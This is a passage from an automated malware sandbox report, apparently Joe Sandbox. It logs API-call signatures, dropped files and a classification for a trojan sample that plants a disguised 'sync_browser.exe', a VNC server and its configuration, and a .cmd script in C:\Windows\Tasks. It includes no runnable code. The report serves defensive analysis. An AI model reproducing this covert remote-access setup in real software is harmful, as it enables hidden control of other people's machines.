                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740012E40 OpenSCManagerA,OpenServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,19_2_00007FF740012E40
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001A130 GetVersionExA,OpenInputDesktop,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,SetThreadDesktop,OpenProcess,OpenProcessToken,CloseHandle,GetModuleFileNameA,CreateProcessAsUserA,GetLastError,CloseHandle,CloseHandle,OpenEventA,SetEvent,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,OpenEventA,SetEvent,GetModuleFileNameA,GetDesktopWindow,ShellExecuteA,InitializeCriticalSection,Sleep,SetThreadDesktop,CloseDesktop,19_2_00007FF74001A130
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400134B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,19_2_00007FF7400134B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740013550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,19_2_00007FF740013550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400134B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,23_2_00007FF7400134B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740013550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,23_2_00007FF740013550
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\4735396734841324Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\B7MqI9.IYF1N0Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Fgyxfc.Qnwi4IJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Ivn55G.PqhJnUJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\ndymzn.PPYh2uJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\4735396734841324.cmdJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\UltraVNC.iniJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to behavior
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_004057210_2_00405721
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_004139D10_2_004139D1
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_00413AAB0_2_00413AAB
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_004133700_2_00413370
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_00413D430_2_00413D43
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_0040AD300_2_0040AD30
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400236D019_2_00007FF7400236D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001A13019_2_00007FF74001A130
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001693019_2_00007FF740016930
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74002D15019_2_00007FF74002D150
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74000517019_2_00007FF740005170
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001898019_2_00007FF740018980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74002F98019_2_00007FF74002F980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400081AD19_2_00007FF7400081AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74000E1D019_2_00007FF74000E1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400251B719_2_00007FF7400251B7
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400C09F019_2_00007FF7400C09F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400079E919_2_00007FF7400079E9
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74000420019_2_00007FF740004200
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740007A1C19_2_00007FF740007A1C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740025A3319_2_00007FF740025A33
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400B725019_2_00007FF7400B7250
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74002623E19_2_00007FF74002623E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001027019_2_00007FF740010270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740007A5B19_2_00007FF740007A5B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740028A7019_2_00007FF740028A70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74000227019_2_00007FF740002270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740003A9019_2_00007FF740003A90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740007A9A19_2_00007FF740007A9A
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740007ACF19_2_00007FF740007ACF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74002C2C019_2_00007FF74002C2C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400712C019_2_00007FF7400712C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740007B0419_2_00007FF740007B04
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74002AB1019_2_00007FF74002AB10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74003033019_2_00007FF740030330
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740007B3719_2_00007FF740007B37
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740007B7119_2_00007FF740007B71
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740017B9019_2_00007FF740017B90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74000439019_2_00007FF740004390
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001BB8019_2_00007FF74001BB80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740007BA619_2_00007FF740007BA6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74002739B19_2_00007FF74002739B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001B3D019_2_00007FF74001B3D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740026BBD19_2_00007FF740026BBD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740007BE219_2_00007FF740007BE2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400193E019_2_00007FF7400193E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740014C1019_2_00007FF740014C10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400BE40019_2_00007FF7400BE400
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74002A42019_2_00007FF74002A420
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400C2C7019_2_00007FF7400C2C70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74003346019_2_00007FF740033460
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400C8C9019_2_00007FF7400C8C90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400354A019_2_00007FF7400354A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740035CA019_2_00007FF740035CA0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740022CC019_2_00007FF740022CC0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74000DCF019_2_00007FF74000DCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74002DCF019_2_00007FF74002DCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740031CE019_2_00007FF740031CE0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740011D1019_2_00007FF740011D10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001AD3019_2_00007FF74001AD30
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001859019_2_00007FF740018590
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740024D7E19_2_00007FF740024D7E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001C5B019_2_00007FF74001C5B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740026DD119_2_00007FF740026DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740001DD019_2_00007FF740001DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740018E1019_2_00007FF740018E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001E61019_2_00007FF74001E610
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74002162019_2_00007FF740021620
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740033E2019_2_00007FF740033E20
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74002265019_2_00007FF740022650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74005065019_2_00007FF740050650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74002AE7019_2_00007FF74002AE70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74003166019_2_00007FF740031660
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740004E8019_2_00007FF740004E80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400C068C19_2_00007FF7400C068C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001974019_2_00007FF740019740
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74000377019_2_00007FF740003770
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001AF6019_2_00007FF74001AF60
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400BDF8019_2_00007FF7400BDF80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74002E78019_2_00007FF74002E780
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74000C81019_2_00007FF74000C810
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74002A87019_2_00007FF74002A870
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74000188019_2_00007FF740001880
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001A89019_2_00007FF74001A890
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001C09019_2_00007FF74001C090
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400170B019_2_00007FF7400170B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001C8D019_2_00007FF74001C8D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400120E019_2_00007FF7400120E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74000A91019_2_00007FF74000A910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF74001110019_2_00007FF740011100
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74001A13023_2_00007FF74001A130
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74001693023_2_00007FF740016930
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74002D15023_2_00007FF74002D150
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74000517023_2_00007FF740005170
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74001898023_2_00007FF740018980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74002F98023_2_00007FF74002F980
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400081AD23_2_00007FF7400081AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74000E1D023_2_00007FF74000E1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400251B723_2_00007FF7400251B7
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400C09F023_2_00007FF7400C09F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400079E923_2_00007FF7400079E9
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74000420023_2_00007FF740004200
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740007A1C23_2_00007FF740007A1C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740025A3323_2_00007FF740025A33
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400B725023_2_00007FF7400B7250
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74002623E23_2_00007FF74002623E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74001027023_2_00007FF740010270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740007A5B23_2_00007FF740007A5B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740028A7023_2_00007FF740028A70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74000227023_2_00007FF740002270
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740003A9023_2_00007FF740003A90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740007A9A23_2_00007FF740007A9A
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740007ACF23_2_00007FF740007ACF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74002C2C023_2_00007FF74002C2C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400712C023_2_00007FF7400712C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740007B0423_2_00007FF740007B04
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74002AB1023_2_00007FF74002AB10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74003033023_2_00007FF740030330
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740007B3723_2_00007FF740007B37
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740007B7123_2_00007FF740007B71
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740017B9023_2_00007FF740017B90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74000439023_2_00007FF740004390
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74001BB8023_2_00007FF74001BB80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740007BA623_2_00007FF740007BA6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74002739B23_2_00007FF74002739B
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74001B3D023_2_00007FF74001B3D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740026BBD23_2_00007FF740026BBD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740007BE223_2_00007FF740007BE2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400193E023_2_00007FF7400193E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740014C1023_2_00007FF740014C10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400BE40023_2_00007FF7400BE400
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74002A42023_2_00007FF74002A420
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400C2C7023_2_00007FF7400C2C70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74003346023_2_00007FF740033460
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400C8C9023_2_00007FF7400C8C90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400354A023_2_00007FF7400354A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740035CA023_2_00007FF740035CA0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74000DCF023_2_00007FF74000DCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74002DCF023_2_00007FF74002DCF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740031CE023_2_00007FF740031CE0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740011D1023_2_00007FF740011D10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74001AD3023_2_00007FF74001AD30
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74001859023_2_00007FF740018590
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740024D7E23_2_00007FF740024D7E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74001C5B023_2_00007FF74001C5B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740026DD123_2_00007FF740026DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740001DD023_2_00007FF740001DD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740022DF323_2_00007FF740022DF3
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740018E1023_2_00007FF740018E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74001E61023_2_00007FF74001E610
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74002162023_2_00007FF740021620
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740033E2023_2_00007FF740033E20
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74002265023_2_00007FF740022650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74005065023_2_00007FF740050650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74002AE7023_2_00007FF74002AE70
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74003166023_2_00007FF740031660
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740004E8023_2_00007FF740004E80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400C068C23_2_00007FF7400C068C
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400236D023_2_00007FF7400236D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74001974023_2_00007FF740019740
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74000377023_2_00007FF740003770
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74001AF6023_2_00007FF74001AF60
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400BDF8023_2_00007FF7400BDF80
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74002E78023_2_00007FF74002E780
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74000C81023_2_00007FF74000C810
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74002A87023_2_00007FF74002A870
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74000188023_2_00007FF740001880
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74001A89023_2_00007FF74001A890
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74001C09023_2_00007FF74001C090
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400170B023_2_00007FF7400170B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74001C8D023_2_00007FF74001C8D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400120E023_2_00007FF7400120E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74000A91023_2_00007FF74000A910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF74001110023_2_00007FF740011100
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Fgyxfc.Qnwi4I F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: String function: 004026B0 appears 38 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF7400B70B4 appears 56 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF7400B9500 appears 42 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF74006A3B0 appears 38 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF740003730 appears 730 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF7400B7C50 appears 60 times
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: String function: 00007FF74000AE30 appears 34 times
                          Source: Fgyxfc.Qnwi4I.0.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: Fgyxfc.Qnwi4I.0.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: Fgyxfc.Qnwi4I.2.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: Fgyxfc.Qnwi4I.2.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: sync_browser.exe.6.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: sync_browser.exe.6.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
                          Source: mSRW5AfJpC.exe, 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebrowser.exe( vs mSRW5AfJpC.exe
                          Source: mSRW5AfJpC.exe, 00000000.00000003.2113874779.0000000002765000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCONHOST.EXEj% vs mSRW5AfJpC.exe
                          Source: mSRW5AfJpC.exe, 00000000.00000003.2115814027.000000000246B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinVNC.exe0 vs mSRW5AfJpC.exe
                          Source: mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinVNC.exe0 vs mSRW5AfJpC.exe
                          Source: mSRW5AfJpC.exe, 00000000.00000003.2112022833.0000000002565000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebrowser.exe( vs mSRW5AfJpC.exe
                          Source: mSRW5AfJpC.exeBinary or memory string: OriginalFilenamebrowser.exe( vs mSRW5AfJpC.exe
                          Source: mSRW5AfJpC.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: Ivn55G.PqhJnU.0.drBinary string: \Device\ConDrv\Serveronecore\windows\core\console\open\src\server\winntcontrol.cpponecore\windows\core\console\open\src\interactivity\base\servicelocator.cppHost Signal Handler Threadonecore\windows\core\console\open\src\interactivity\base\hostsignalinputthread.cpponecore\windows\core\console\open\src\interactivity\win32\uiatextrange.cpponecore\windows\core\console\open\src\interactivity\win32\accessibilitynotifier.cpponecore\windows\core\console\open\src\interactivity\win32\windowmetrics.cpponecore\windows\core\console\open\src\interactivity\win32\systemconfigurationprovider.cpponecore\windows\core\console\open\src\interactivity\win32\window.cpponecore\windows\core\console\open\src\interactivity\win32\windowio.cpponecore\windows\core\console\open\src\interactivity\win32\icon.cpponecore\windows\core\console\open\src\interactivity\win32\windowuiaprovider.cpponecore\windows\core\console\open\src\interactivity\win32\windowproc.cpponecore\windows\core\console\open\src\interactivity\win32\clipboard.cpponecore\windows\core\console\open\src\interactivity\win32\screeninfouiaprovider.cpponecore\windows\core\console\open\src\types\viewport.cpponecore\windows\core\console\open\src\types\convert.cpponecore\windows\core\console\open\src\types\utils.cpp
                          Source: classification engineClassification label: mal84.troj.spyw.evad.winEXE@56/60@2/1
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_00408DBF wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00408DBF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400134B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,19_2_00007FF7400134B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740013550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,19_2_00007FF740013550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF7400118A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,19_2_00007FF7400118A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400134B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,23_2_00007FF7400134B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF740013550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,23_2_00007FF740013550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7400118A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,23_2_00007FF7400118A0
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_004011D1 GetDiskFreeSpaceExW,SendMessageW,0_2_004011D1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,19_2_00007FF740012D00
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,23_2_00007FF740012D00
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 19_2_00007FF740069BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,19_2_00007FF740069BC0
                          Source: C:\Users\user\Desktop\mSRW5AfJpC.exeCode function: 0_2_0040385E _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_0040385E
